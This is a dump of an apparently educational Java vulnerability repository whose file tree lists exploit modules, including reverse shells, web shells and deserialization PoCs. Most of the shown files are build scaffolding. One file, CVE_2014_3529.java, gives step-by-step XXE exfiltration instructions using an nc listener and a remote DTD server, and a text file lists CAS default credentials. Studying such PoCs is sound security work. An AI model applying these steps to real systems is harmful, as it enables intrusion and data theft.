├── .gitignore ├── LICENSE ├── README.md ├── ShardingSphere-UI ├── CVE-2020-1947 │ ├── README.md │ ├── pom.xml │ └── src │ │ └── main │ │ └── java │ │ └── com │ │ └── threedr3am │ │ └── bug │ │ └── shardingsphere │ │ └── ui │ │ └── Poc.java └── pom.xml ├── apache-poi ├── cve-2014-3529 │ ├── pom.xml │ └── src │ │ └── main │ │ ├── java │ │ └── com │ │ │ └── threedr3am │ │ │ └── bug │ │ │ └── poi │ │ │ └── CVE_2014_3529.java │ │ └── resources │ │ ├── test.xlsx │ │ └── xxe.dtd └── pom.xml ├── cas ├── 4.1.7-4.2.x │ ├── pom.xml │ └── src │ │ └── main │ │ ├── java │ │ └── com │ │ │ └── threedr3am │ │ │ └── bug │ │ │ └── cas │ │ │ ├── AttackDemo.java │ │ │ └── package-info.java │ │ ├── resources │ │ └── log4j2.xml │ │ └── webapp │ │ └── WEB-INF │ │ ├── cas.properties │ │ └── web.xml ├── 4.1.x-4.1.6 │ ├── pom.xml │ └── src │ │ └── main │ │ ├── java │ │ └── com │ │ │ └── threedr3am │ │ │ └── bug │ │ │ └── cas │ │ │ ├── AttackDemo.java │ │ │ └── package-info.java │ │ ├── resources │ │ ├── etc │ │ │ └── keystore.jceks │ │ └── log4j2.xml │ │ └── webapp │ │ └── WEB-INF │ │ ├── cas.properties │ │ └── web.xml ├── 5.x │ ├── pom.xml │ └── src │ │ └── main │ │ ├── java │ │ └── com │ │ │ └── threedr3am │ │ │ └── bug │ │ │ └── cas │ │ │ └── package-info.java │ │ ├── resources │ │ ├── META-INF │ │ │ └── spring.factories │ │ ├── application.properties │ │ └── log4j2.xml │ │ └── webapp │ │ └── WEB-INF │ │ └── web.xml ├── CAS4PaddingOracleCBC │ ├── pom.xml │ └── src │ │ └── main │ │ └── java │ │ └── com │ │ └── threedr3am │ │ └── bug │ │ └── cas │ │ ├── CasPaddingOracleCBC.java │ │ ├── package-info.java │ │ └── support │ │ ├── ByteUtil.java │ │ ├── CiphertextHeader.java │ │ └── PaddingOracleCBCForShiro.java ├── cas服务部署.gif ├── cas默认账号密码.txt ├── pom.xml └── src │ └── main │ └── java │ └── com │ └── threedr3am │ └── bug │ └── cas │ └── package-info.java ├── common-collections ├── pom.xml └── src │ └── main │ └── java │ └── com │ └── threedr3am │ └── bug │ └── collections │ ├── 
package-info.java │ └── v3 │ ├── no1 │ └── SerializeMapForTransformer.java │ ├── no2 │ ├── CallbackRuntime.java │ ├── CallbackRuntime2.java │ └── SerializeMapForTransformer.java │ └── package-info.java ├── common ├── pom.xml └── src │ └── main │ ├── java │ ├── Calc.java │ ├── CalcScriptEngineFactory.java │ ├── ListenerShell.java │ ├── ReverseShell.java │ ├── ThymeleafSpelExp.java │ ├── TomcatEchoInject.java │ ├── TomcatShellInject.java │ ├── WebShell.java │ ├── com │ │ └── threedr3am │ │ │ └── bug │ │ │ └── common │ │ │ ├── package-info.java │ │ │ ├── server │ │ │ ├── FtpServer.java │ │ │ ├── HTTPServer.java │ │ │ ├── LdapServer.java │ │ │ ├── RmiServer.java │ │ │ └── package-info.java │ │ │ ├── support │ │ │ └── ClassFiles.java │ │ │ └── utils │ │ │ ├── FileToByteArrayUtil.java │ │ │ ├── HttpUtil.java │ │ │ ├── Reflections.java │ │ │ ├── SerializeUtil.java │ │ │ ├── TemplatesUtil.java │ │ │ └── package-info.java │ └── org │ │ └── apache │ │ └── catalina │ │ └── startup │ │ └── Catalina.java │ └── resources │ └── META-INF │ └── services │ └── javax.script.ScriptEngineFactory ├── dubbo ├── dubbo-hessian2-safe-reinforcement │ ├── learn-dubbo-client-boot │ │ ├── pom.xml │ │ └── src │ │ │ ├── main │ │ │ ├── java │ │ │ │ └── com │ │ │ │ │ └── threedr3am │ │ │ │ │ └── learn │ │ │ │ │ ├── client │ │ │ │ │ └── boot │ │ │ │ │ │ ├── LearnDubboClientBootApplication.java │ │ │ │ │ │ └── Test.java │ │ │ │ │ └── serialize │ │ │ │ │ ├── MyHessian2Input.java │ │ │ │ │ ├── MyHessian2ObjectInput.java │ │ │ │ │ └── MyHessian2Serialization.java │ │ │ └── resources │ │ │ │ ├── META-INF │ │ │ │ └── dubbo │ │ │ │ │ └── org.apache.dubbo.common.serialize.Serialization │ │ │ │ └── application.properties │ │ │ └── test │ │ │ └── java │ │ │ └── com │ │ │ └── threedr3am │ │ │ └── learn │ │ │ └── client │ │ │ └── boot │ │ │ └── LearnDubboClientBootApplicationTests.java │ ├── learn-dubbo-server-boot │ │ ├── pom.xml │ │ └── src │ │ │ ├── main │ │ │ ├── java │ │ │ │ └── com │ │ │ │ │ └── 
threedr3am │ │ │ │ │ └── learn │ │ │ │ │ └── server │ │ │ │ │ └── boot │ │ │ │ │ ├── A.java │ │ │ │ │ ├── B.java │ │ │ │ │ ├── DemoService.java │ │ │ │ │ ├── DemoServiceImpl.java │ │ │ │ │ ├── LearnDubboServerBootApplication.java │ │ │ │ │ └── serialize │ │ │ │ │ ├── MyHessian2Input.java │ │ │ │ │ ├── MyHessian2ObjectInput.java │ │ │ │ │ └── MyHessian2Serialization.java │ │ │ └── resources │ │ │ │ ├── META-INF │ │ │ │ └── dubbo │ │ │ │ │ └── org.apache.dubbo.common.serialize.Serialization │ │ │ │ └── application.properties │ │ │ └── test │ │ │ └── java │ │ │ └── com │ │ │ └── threedr3am │ │ │ └── learn │ │ │ └── server │ │ │ └── boot │ │ │ └── LearnDubboServerBootApplicationTests.java │ ├── module-info │ └── pom.xml ├── pom.xml └── src │ └── main │ └── java │ └── com │ └── threedr3am │ └── bug │ └── dubbo │ ├── ResinPoc.java │ ├── RomePoc.java │ ├── SpringAbstractBeanFactoryPointcutAdvisorPoc.java │ ├── XBeanPoc.java │ ├── rouge │ ├── RougeBase.java │ ├── hessian2 │ │ ├── ResinPoc.java │ │ ├── RomePoc.java │ │ ├── SpringAbstractBeanFactoryPointcutAdvisorPoc.java │ │ └── XBeanPoc.java │ ├── java │ │ ├── CommonsBeanUtils.java │ │ ├── CommonsCollections10.java │ │ ├── CommonsCollections11.java │ │ ├── CommonsCollections2.java │ │ ├── CommonsCollections8.java │ │ ├── DNSURL.java │ │ └── JRMPClient.java │ └── package-info.java │ ├── support │ └── NoWriteReplaceSerializerFactory.java │ └── utils │ ├── Gadgets.java │ ├── JDKUtil.java │ ├── SpringUtil.java │ ├── TemplatesUtil.java │ ├── ToStringUtil.java │ └── UtilFactory.java ├── fastjson ├── pom.xml └── src │ └── main │ └── java │ ├── Evil.java │ └── com │ └── threedr3am │ └── bug │ └── fastjson │ ├── dns │ ├── Inet4AddressPoc.java │ ├── Inet6AddressPoc.java │ ├── InetSocketAddressPoc.java │ └── URLPoc.java │ ├── dos │ └── ReDOSPoc.java │ ├── file │ └── FileWriteBypassAutoType1_2_68.java │ ├── leak │ └── seleniumBypassAutotype1_2_68.java │ ├── package-info.java │ ├── rce │ ├── AnterosPoc.java │ ├── AriesJMSPoc.java │ ├── 
AriesJMSPoc2.java │ ├── Cmd.java │ ├── CocoonSlidePoc.java │ ├── CommonsProxyPoc.java │ ├── FastjsonSerialize.java │ ├── HadoopHikariPoc.java │ ├── HikariConfigPoc.java │ ├── IbatisSqlmapPoc.java │ ├── IgniteJtaPoc.java │ ├── JndiConverterPoc.java │ ├── NoNeedAutoTypePoc.java │ ├── QuercusPoc.java │ ├── ShiroPoc.java │ └── ShiroPoc2.java │ └── ssrf │ ├── ApacheCxfSSRFPoc.java │ ├── ApacheCxfSSRFPoc2.java │ ├── CommonsJellySSRFPoc.java │ └── JREJeditorPaneSSRFPoc.java ├── feature ├── pom.xml └── src │ └── main │ └── java │ └── com │ └── threedr3am │ └── bug │ └── feature │ ├── CAS4$1And4$2.java │ ├── FastjsonSerialization.java │ ├── HessianSerialization.java │ ├── JYAML.java │ ├── JacksonSerialization.java │ ├── JavaClassByteCode.java │ ├── JavaSerialization.java │ ├── JolokiaAttackUrlFeature.java │ ├── KryoSerialization.java │ ├── SnakeYAML.java │ ├── XStream.java │ └── package-info.java ├── jackson ├── pom.xml └── src │ └── main │ ├── java │ └── com │ │ └── threedr3am │ │ └── bug │ │ └── jackson │ │ ├── MysqlFileRead.java │ │ ├── package-info.java │ │ ├── rce │ │ ├── AnterosPoc.java │ │ ├── AriesJMSPoc.java │ │ ├── AriesJMSPoc2.java │ │ ├── EhcacheJndi.java │ │ ├── H2Rce.java │ │ ├── HadoopHikariConfigPoc.java │ │ ├── HikariConfigPoc.java │ │ ├── IbatisSqlmapPoc.java │ │ ├── IgniteJtaPoc.java │ │ ├── IgniteJtaPoc2.java │ │ ├── JndiConverterPoc.java │ │ ├── LogbackJndi.java │ │ ├── QuartzPoc.java │ │ ├── QuercusPoc.java │ │ ├── ShiroPoc.java │ │ ├── ShiroPoc2.java │ │ ├── SpringAopPoc.java │ │ └── SpringAopPoc2.java │ │ ├── ssrf │ │ └── JREJeditorPaneSSRFPoc.java │ │ └── test │ │ ├── A.java │ │ ├── DefaultTypeTest.java │ │ ├── JsonTypeInfoTest.java │ │ └── PocTest.java │ └── resources │ └── inject.sql ├── java-compile ├── pom.xml └── src │ └── main │ └── java │ └── com │ └── threedr3am │ └── bug │ └── compile │ ├── javac │ ├── ByJavaCompiler.java │ ├── ByJavaFileObject.java │ ├── CustomJavaFileObject.java │ ├── CustomJavaFileObjectAndFileManeger.java │ └── 
RuntimeMakeClass.java │ ├── javassist │ └── Javassist.java │ └── package-info.java ├── nexus ├── CVE-2020-10199 │ └── README.md ├── CVE-2020-10204 │ └── README.md ├── CVE-2020-11444 │ └── README.md └── pom.xml ├── padding-oracle-cbc ├── pom.xml └── src │ └── main │ └── java │ └── com │ └── threedr3am │ └── bug │ └── paddingoraclecbc │ ├── PaddingOracle.java │ ├── PaddingOracleCBC.java │ ├── PaddingOracleCBC2.java │ ├── PaddingOracleCBCForShiro.java │ └── package-info.java ├── pom.xml ├── rmi ├── pom.xml └── src │ └── main │ └── java │ └── com │ └── threedr3am │ └── bug │ └── rmi │ ├── CommonCollections4.java │ ├── client │ ├── JndiLookupForGtJdk8u191.java │ ├── JndiLookupForJdk8u121To191.java │ ├── JndiLookupForLeJdk8u121.java │ └── RMIClient.java │ ├── registry │ ├── AttackRMIRegistry.java │ └── RMIRegistry.java │ ├── server │ ├── RMIServer.java │ └── service │ │ ├── HelloService.java │ │ └── HelloServiceImpl.java │ ├── support │ └── ClassFiles.java │ └── utils │ ├── Gadgets.java │ └── Reflections.java ├── security-manager ├── pom.xml └── src │ └── main │ └── java │ └── com │ └── threedr3am │ └── bug │ └── security │ └── manager │ ├── AttackTest.java │ ├── CodeBaseTest.java │ ├── Evil.java │ └── package-info.java ├── shiro ├── auth-bypass-shiro-1-4-1 │ ├── pom.xml │ └── src │ │ └── main │ │ └── java │ │ └── com │ │ └── threedr3am │ │ └── bug │ │ └── shiro │ │ └── bypass │ │ └── auth │ │ ├── Application.java │ │ ├── config │ │ └── ShiroConfig.java │ │ ├── controller │ │ ├── BypassTestController.java │ │ └── LoginController.java │ │ └── realm │ │ └── MyRealm.java ├── auth-bypass-shiro-1-5-1 │ ├── pom.xml │ └── src │ │ └── main │ │ ├── java │ │ └── com │ │ │ └── threedr3am │ │ │ └── bug │ │ │ └── shiro │ │ │ └── bypass │ │ │ └── auth │ │ │ ├── Application.java │ │ │ ├── config │ │ │ └── ShiroConfig.java │ │ │ ├── controller │ │ │ ├── BypassTestController.java │ │ │ └── LoginController.java │ │ │ └── realm │ │ │ └── MyRealm.java │ │ └── resources │ │ └── 
application.yml ├── auth-bypass-shiro-1-5-3 │ ├── pom.xml │ └── src │ │ └── main │ │ ├── java │ │ └── me │ │ │ └── threedr3am │ │ │ └── bug │ │ │ └── shiro │ │ │ └── bypass │ │ │ └── auth │ │ │ ├── Application.java │ │ │ ├── config │ │ │ └── ShiroConfig.java │ │ │ ├── controller │ │ │ ├── BypassTestController.java │ │ │ └── LoginController.java │ │ │ └── realm │ │ │ └── MyRealm.java │ │ └── resources │ │ └── application.yml ├── auth-bypass-shiro-1-7-1 │ ├── pom.xml │ └── src │ │ └── main │ │ └── java │ │ └── me │ │ └── threedr3am │ │ └── bug │ │ └── shiro │ │ └── bypass │ │ └── auth │ │ ├── Application.java │ │ ├── config │ │ └── ShiroConfig.java │ │ ├── controller │ │ ├── BypassTestController.java │ │ └── LoginController.java │ │ └── realm │ │ └── MyRealm.java ├── auth-bypass-shiro-1-8-0 │ ├── pom.xml │ └── src │ │ └── main │ │ └── java │ │ └── me │ │ └── threedr3am │ │ └── bug │ │ └── shiro │ │ └── bypass │ │ └── auth │ │ ├── Application.java │ │ ├── config │ │ └── ShiroConfig.java │ │ ├── controller │ │ ├── BypassTestController.java │ │ └── LoginController.java │ │ └── realm │ │ └── MyRealm.java └── pom.xml ├── spring ├── pom.xml ├── spring-boot-actuator-bug │ ├── README.md │ ├── actuator-1.2 │ │ ├── pom.xml │ │ └── src │ │ │ └── main │ │ │ ├── java │ │ │ └── com │ │ │ │ └── threedr3am │ │ │ │ └── bug │ │ │ │ └── spring │ │ │ │ └── actuator │ │ │ │ ├── Application.java │ │ │ │ ├── AttackSnakeYaml.java │ │ │ │ └── JolokiaAttackForLogback.java │ │ │ └── resources │ │ │ ├── logback-evil.xml │ │ │ ├── logback.xml │ │ │ └── snake-yaml-evil.yml │ ├── actuator-1.3 │ │ ├── pom.xml │ │ └── src │ │ │ └── main │ │ │ ├── java │ │ │ └── com │ │ │ │ └── threedr3am │ │ │ │ └── bug │ │ │ │ └── spring │ │ │ │ └── actuator │ │ │ │ ├── Application.java │ │ │ │ ├── AttackSnakeYaml.java │ │ │ │ └── JolokiaAttackForLogback.java │ │ │ └── resources │ │ │ ├── logback-evil.xml │ │ │ ├── logback.xml │ │ │ └── snake-yaml-evil.yml │ ├── actuator-1.4 │ │ ├── pom.xml │ │ └── src │ │ │ └── 
main │ │ │ ├── java │ │ │ └── com │ │ │ │ └── threedr3am │ │ │ │ └── bug │ │ │ │ └── spring │ │ │ │ └── actuator │ │ │ │ ├── Application.java │ │ │ │ ├── AttackSnakeYaml.java │ │ │ │ ├── EurekaAttackForXStream.java │ │ │ │ └── JolokiaAttackForLogback.java │ │ │ └── resources │ │ │ ├── logback-evil.xml │ │ │ ├── logback.xml │ │ │ ├── snake-yaml-evil.yml │ │ │ └── xstream-evil.xml │ ├── actuator-1.5 │ │ ├── pom.xml │ │ └── src │ │ │ └── main │ │ │ ├── java │ │ │ └── com │ │ │ │ └── threedr3am │ │ │ │ └── bug │ │ │ │ └── spring │ │ │ │ └── actuator │ │ │ │ ├── Application.java │ │ │ │ ├── AttackSnakeYaml.java │ │ │ │ ├── JolokiaAttackForLogback.java │ │ │ │ └── package-info.java │ │ │ └── resources │ │ │ ├── application.yml │ │ │ ├── logback-evil.xml │ │ │ ├── logback.xml │ │ │ └── snake-yaml-evil.yml │ ├── actuator-2.0 │ │ ├── pom.xml │ │ └── src │ │ │ └── main │ │ │ ├── java │ │ │ └── com │ │ │ │ └── threedr3am │ │ │ │ └── bug │ │ │ │ └── spring │ │ │ │ └── actuator │ │ │ │ ├── Application.java │ │ │ │ ├── AttackHikariCP.java │ │ │ │ ├── AttackSnakeYaml.java │ │ │ │ ├── JolokiaAttackForLogback.java │ │ │ │ └── package-info.java │ │ │ └── resources │ │ │ ├── application.yml │ │ │ └── logback.xml │ ├── pom.xml │ └── src │ │ └── main │ │ └── java │ │ └── com │ │ └── threedr3am │ │ └── bug │ │ └── spring │ │ └── actuator │ │ └── snakeyaml │ │ ├── A.java │ │ └── SnakeYamlTest.java ├── spring-cloud-config-server-CVE-2019-3799 │ ├── pom.xml │ └── src │ │ └── main │ │ ├── java │ │ └── com │ │ │ └── threedr3am │ │ │ └── bug │ │ │ └── spring │ │ │ └── config │ │ │ └── server │ │ │ ├── Application.java │ │ │ └── package-info.java │ │ └── resources │ │ └── application.yml ├── spring-cloud-config-server-CVE-2020-5405 │ ├── pom.xml │ └── src │ │ └── main │ │ ├── java │ │ └── com │ │ │ └── threedr3am │ │ │ └── bug │ │ │ └── spring │ │ │ └── config │ │ │ └── server │ │ │ ├── Application.java │ │ │ └── package-info.java │ │ └── resources │ │ └── application.yml ├── 
spring-cloud-config-server-CVE-2020-5410 │ ├── pom.xml │ └── src │ │ └── main │ │ ├── java │ │ └── com │ │ │ └── threedr3am │ │ │ └── bug │ │ │ └── spring │ │ │ └── config │ │ │ └── server │ │ │ ├── Application.java │ │ │ └── package-info.java │ │ └── resources │ │ └── application.yml ├── spring-data-mongodb-spel-CVE-2022-22980 │ ├── README.md │ ├── pom.xml │ └── src │ │ └── main │ │ ├── java │ │ └── com │ │ │ └── threedr3am │ │ │ └── bug │ │ │ └── spring │ │ │ └── data │ │ │ └── mongodb │ │ │ ├── Application.java │ │ │ ├── controller │ │ │ └── DemoController.java │ │ │ ├── entity │ │ │ └── Demo.java │ │ │ └── repository │ │ │ └── DemoRepository.java │ │ └── resources │ │ └── application.yml ├── spring-session-redis-sync │ ├── 1 │ │ ├── pom.xml │ │ └── src │ │ │ └── main │ │ │ ├── java │ │ │ └── me │ │ │ │ └── threedr3am │ │ │ │ └── bug │ │ │ │ └── spring │ │ │ │ └── redis │ │ │ │ └── session │ │ │ │ ├── Application.java │ │ │ │ ├── config │ │ │ │ └── SpringHttpSessionConfig.java │ │ │ │ └── controller │ │ │ │ └── TestController.java │ │ │ └── resources │ │ │ └── application.yml │ ├── 2 │ │ ├── pom.xml │ │ └── src │ │ │ └── main │ │ │ ├── java │ │ │ └── me │ │ │ │ └── threedr3am │ │ │ │ └── bug │ │ │ │ └── spring │ │ │ │ └── redis │ │ │ │ └── session │ │ │ │ ├── Application.java │ │ │ │ ├── config │ │ │ │ └── SpringHttpSessionConfig.java │ │ │ │ └── controller │ │ │ │ └── TestController.java │ │ │ └── resources │ │ │ └── application.yml │ ├── README.md │ ├── pom.xml │ └── src │ │ └── main │ │ └── java │ │ └── me │ │ └── threedr3am │ │ └── bug │ │ └── spring │ │ └── redis │ │ └── session │ │ ├── CommonCollections4.java │ │ ├── Main.java │ │ ├── support │ │ └── ClassFiles.java │ │ └── utils │ │ ├── Gadgets.java │ │ └── Reflections.java ├── spring-uricomponentsbuilder-2 │ ├── pom.xml │ └── src │ │ └── main │ │ └── java │ │ └── com │ │ └── threedr3am │ │ └── bug │ │ └── spring │ │ └── uricomponentsbuilder │ │ ├── Main.java │ │ └── controller │ │ └── 
OAuthController.java └── spring-uricomponentsbuilder │ ├── pom.xml │ └── src │ └── main │ └── java │ └── com │ └── threedr3am │ └── bug │ └── spring │ └── uricomponentsbuilder │ ├── Main.java │ └── controller │ └── OAuthController.java ├── tomcat ├── ajp-bug │ ├── README.md │ ├── pom.xml │ └── src │ │ └── main │ │ └── java │ │ └── com │ │ └── threedr3am │ │ └── bug │ │ └── tomcat │ │ └── ajp │ │ ├── FileRead.java │ │ └── support │ │ ├── SimpleAjpClient.java │ │ └── TesterAjpMessage.java ├── pom.xml ├── session-filestore │ ├── README.md │ └── pom.xml └── sync-session-bug │ ├── README.md │ ├── pom.xml │ └── src │ └── main │ └── java │ └── com │ └── threedr3am │ └── bug │ └── tomcat │ └── sync │ └── session │ ├── TomcatSessionClusterExploit.java │ ├── payload │ ├── Jdk7u21.java │ ├── Jdk8u20.java │ ├── Payload.java │ ├── Payloads.java │ └── URLDNS.java │ ├── support │ ├── ChannelData.java │ ├── ChannelMessage.java │ ├── ClusterMessage.java │ ├── ClusterMessageBase.java │ ├── Member.java │ ├── MemberImpl.java │ ├── SessionMessage.java │ ├── SessionMessageImpl.java │ ├── UUIDGenerator.java │ └── XByteBuffer.java │ └── utils │ ├── ClassFiles.java │ ├── Converter.java │ ├── Gadgets.java │ ├── Reflections.java │ └── Serializer.java └── xxe ├── pom.xml └── src └── main └── java └── com └── threedr3am └── bug └── xxe ├── DocumentBuilderFactory_DOMTest.java ├── Features.java ├── Payloads.java ├── SAXBuilder_JDOMTest.java ├── SAXParserFactory_SAXTest.java ├── SAXReader_DOM4JTest.java ├── SAXTransformerFactoryTest.java ├── SchemaFactoryTest.java ├── TransformerFactoryTest.java ├── UnmarshallerTest.java ├── ValidatorSampleTest.java ├── XMLReaderTest.java └── package-info.java /.gitignore: -------------------------------------------------------------------------------- 1 | .idea 2 | *.iml 3 | target 4 | cas/**/overlays 5 | cas/**/lib 6 | -------------------------------------------------------------------------------- /LICENSE: 
-------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2020 threedr3am 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 
22 | -------------------------------------------------------------------------------- /ShardingSphere-UI/CVE-2020-1947/README.md: -------------------------------------------------------------------------------- 1 | ### *ShardingSphere-UI YAML反序列化* 2 | 3 | CVE-2020-1947 4 | 5 | #### 二进制运行 6 | - git clone https://github.com/apache/incubator-shardingsphere.git; 7 | - 运行 mvn clean install -Prelease; 8 | - 获取安装包 /sharding-distribution/shardingsphere-ui-distribution/target/apache-shardingsphere-incubating-${latest.release.version}-sharding-ui-bin.tar.gz; 9 | - 解压缩后运行bin/start.sh; 10 | - 访问http://localhost:8088/。 11 | 12 | ``` 13 | server.port=8088 14 | 15 | user.admin.username=admin 16 | user.admin.password=admin 17 | ``` -------------------------------------------------------------------------------- /ShardingSphere-UI/CVE-2020-1947/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | ShardingSphere-UI 7 | com.xyh 8 | 1.0-SNAPSHOT 9 | 10 | 4.0.0 11 | 12 | CVE-2020-1947 13 | 14 | 15 | 16 | com.xyh 17 | common 18 | 1.0-SNAPSHOT 19 | 20 | 21 | -------------------------------------------------------------------------------- /ShardingSphere-UI/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | learn-java-bug 7 | com.xyh 8 | 1.0-SNAPSHOT 9 | 10 | 4.0.0 11 | 12 | ShardingSphere-UI 13 | pom 14 | 15 | CVE-2020-1947 16 | 17 | 18 | 19 | -------------------------------------------------------------------------------- /apache-poi/cve-2014-3529/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | apache-poi 7 | com.xyh 8 | 1.0-SNAPSHOT 9 | 10 | 4.0.0 11 | 12 | cve-2014-3529 13 | 14 | 15 | 16 | 17 | org.apache.poi 18 | poi-ooxml 19 | 3.10-FINAL 20 | 21 | 22 | 23 | -------------------------------------------------------------------------------- /apache-poi/cve-2014-3529/src/main/java/com/threedr3am/bug/poi/CVE_2014_3529.java: 
-------------------------------------------------------------------------------- 1 | package com.threedr3am.bug.poi; 2 | 3 | import java.io.IOException; 4 | import org.apache.poi.EncryptedDocumentException; 5 | import org.apache.poi.ss.usermodel.Sheet; 6 | import org.apache.poi.ss.usermodel.Workbook; 7 | import org.apache.poi.ss.usermodel.WorkbookFactory; 8 | 9 | /** 10 | * 1. unzip test.xlsx 11 | * 2. vim [Content_Types].xml,line-2 insert ( %remote;%all;]>&send; ) 12 | * 3. zip -r 0 test.xlsx ./* 13 | * 4. echo "threedr3am" > /tmp/flag 14 | * 5. nc -lvvp 23235 15 | * 6. cp xxe.dtd /tmp/poi/xxe.dtd & cd /tmp/poi/ & python -m SimpleHTTPServer 23234 16 | * 17 | * @author threedr3am 18 | */ 19 | public class CVE_2014_3529 { 20 | 21 | public static void main(String[] args) 22 | throws IOException, EncryptedDocumentException, org.apache.poi.openxml4j.exceptions.InvalidFormatException { 23 | Workbook wb1 = WorkbookFactory.create(CVE_2014_3529.class.getClassLoader().getResourceAsStream("test.xlsx")); 24 | Sheet sheet = wb1.getSheetAt(0); 25 | System.out.println(sheet.getLastRowNum()); 26 | } 27 | } 28 | -------------------------------------------------------------------------------- /apache-poi/cve-2014-3529/src/main/resources/test.xlsx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/threedr3am/learnjavabug/3f7fe9d8eab29f88fd0c6fb8362d21696b5cb95c/apache-poi/cve-2014-3529/src/main/resources/test.xlsx -------------------------------------------------------------------------------- /apache-poi/cve-2014-3529/src/main/resources/xxe.dtd: -------------------------------------------------------------------------------- 1 | "> -------------------------------------------------------------------------------- /apache-poi/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | learn-java-bug 7 | com.xyh 8 | 1.0-SNAPSHOT 9 | 10 | 4.0.0 11 | 12 | apache-poi 13 | pom 14 
| 15 | cve-2014-3529 16 | 17 | 18 | -------------------------------------------------------------------------------- /cas/4.1.7-4.2.x/src/main/java/com/threedr3am/bug/cas/package-info.java: -------------------------------------------------------------------------------- 1 | /** 2 | * @author threedr3am 3 | */ 4 | package com.threedr3am.bug.cas; -------------------------------------------------------------------------------- /cas/4.1.x-4.1.6/src/main/java/com/threedr3am/bug/cas/package-info.java: -------------------------------------------------------------------------------- 1 | /** 2 | * @author threedr3am 3 | */ 4 | package com.threedr3am.bug.cas; -------------------------------------------------------------------------------- /cas/4.1.x-4.1.6/src/main/resources/etc/keystore.jceks: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/threedr3am/learnjavabug/3f7fe9d8eab29f88fd0c6fb8362d21696b5cb95c/cas/4.1.x-4.1.6/src/main/resources/etc/keystore.jceks -------------------------------------------------------------------------------- /cas/5.x/src/main/java/com/threedr3am/bug/cas/package-info.java: -------------------------------------------------------------------------------- 1 | /** 2 | * overlays:想要自定义啥东西,从target/cas自己捞,classes里面的文件,如果是类, 则按照包名和类名在src/main/java放,若是资源文件,则放置到resources 3 | * 4 | * 启动的话,需要在project structure,即项目结构设置中Facets的web添加当前项目的资源目录(webapp)进去,然后配置artifacts,添加web application 5 | * archive和web application exploded,前者对应war包,后者对应war解压目录,tomcat部署需要 6 | * 7 | * @author threedr3am 8 | */ 9 | package com.threedr3am.bug.cas; -------------------------------------------------------------------------------- /cas/5.x/src/main/resources/META-INF/spring.factories: -------------------------------------------------------------------------------- 1 | org.springframework.boot.autoconfigure.EnableAutoConfiguration=\ 2 | org.apereo.cas.config.CasEmbeddedContainerTomcatConfiguration,\ 3 | 
org.apereo.cas.config.CasEmbeddedContainerTomcatFiltersConfiguration 4 | 5 | -------------------------------------------------------------------------------- /cas/5.x/src/main/webapp/WEB-INF/web.xml: -------------------------------------------------------------------------------- 1 | 2 | 6 | -------------------------------------------------------------------------------- /cas/CAS4PaddingOracleCBC/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | cas 7 | com.xyh 8 | 1.0-SNAPSHOT 9 | 10 | 4.0.0 11 | 12 | PaddingOracleCBC 13 | 14 | 15 | 16 | com.xyh 17 | common 18 | 1.0-SNAPSHOT 19 | 20 | 21 | 22 | -------------------------------------------------------------------------------- /cas/CAS4PaddingOracleCBC/src/main/java/com/threedr3am/bug/cas/package-info.java: -------------------------------------------------------------------------------- 1 | /** 2 | * CAS-4 PaddingOracle CBC攻击 3 | * 4 | * @author threedr3am 5 | */ 6 | package com.threedr3am.bug.cas; -------------------------------------------------------------------------------- /cas/cas服务部署.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/threedr3am/learnjavabug/3f7fe9d8eab29f88fd0c6fb8362d21696b5cb95c/cas/cas服务部署.gif -------------------------------------------------------------------------------- /cas/cas默认账号密码.txt: -------------------------------------------------------------------------------- 1 | 账号:casuser 2 | 密码:Mellon -------------------------------------------------------------------------------- /cas/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | learn-java-bug 7 | com.xyh 8 | 1.0-SNAPSHOT 9 | 10 | 4.0.0 11 | 12 | cas 13 | pom 14 | 15 | 4.1.x-4.1.6 16 | 5.x 17 | 4.1.7-4.2.x 18 | CAS4PaddingOracleCBC 19 | 20 | 21 | 22 | 23 | org.apache.commons 24 | commons-collections4 25 | 4.0 26 | 27 | 28 | 29 | com.mchange 30 | c3p0 31 | 
0.9.5.2 32 | 33 | 34 | 35 | -------------------------------------------------------------------------------- /cas/src/main/java/com/threedr3am/bug/cas/package-info.java: -------------------------------------------------------------------------------- 1 | /** 2 | * 3 | * 想学CAS源码,建议先去学习Spring webflow, 4 | * 若是maven编译,找不到com.xyh.**等包,则先在maven面板,执行learn-java-bug->Lifecycle->package 5 | * 6 | * @author threedr3am 7 | */ 8 | package com.threedr3am.bug.cas; -------------------------------------------------------------------------------- /common-collections/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | learn-java-bug 7 | com.xyh 8 | 1.0-SNAPSHOT 9 | 10 | 4.0.0 11 | 12 | common-collections 13 | 14 | 15 | 16 | 17 | commons-collections 18 | commons-collections 19 | 3.2.1 20 | 21 | 22 | 23 | com.xyh 24 | common 25 | 1.0-SNAPSHOT 26 | 27 | 28 | 29 | -------------------------------------------------------------------------------- /common-collections/src/main/java/com/threedr3am/bug/collections/package-info.java: -------------------------------------------------------------------------------- 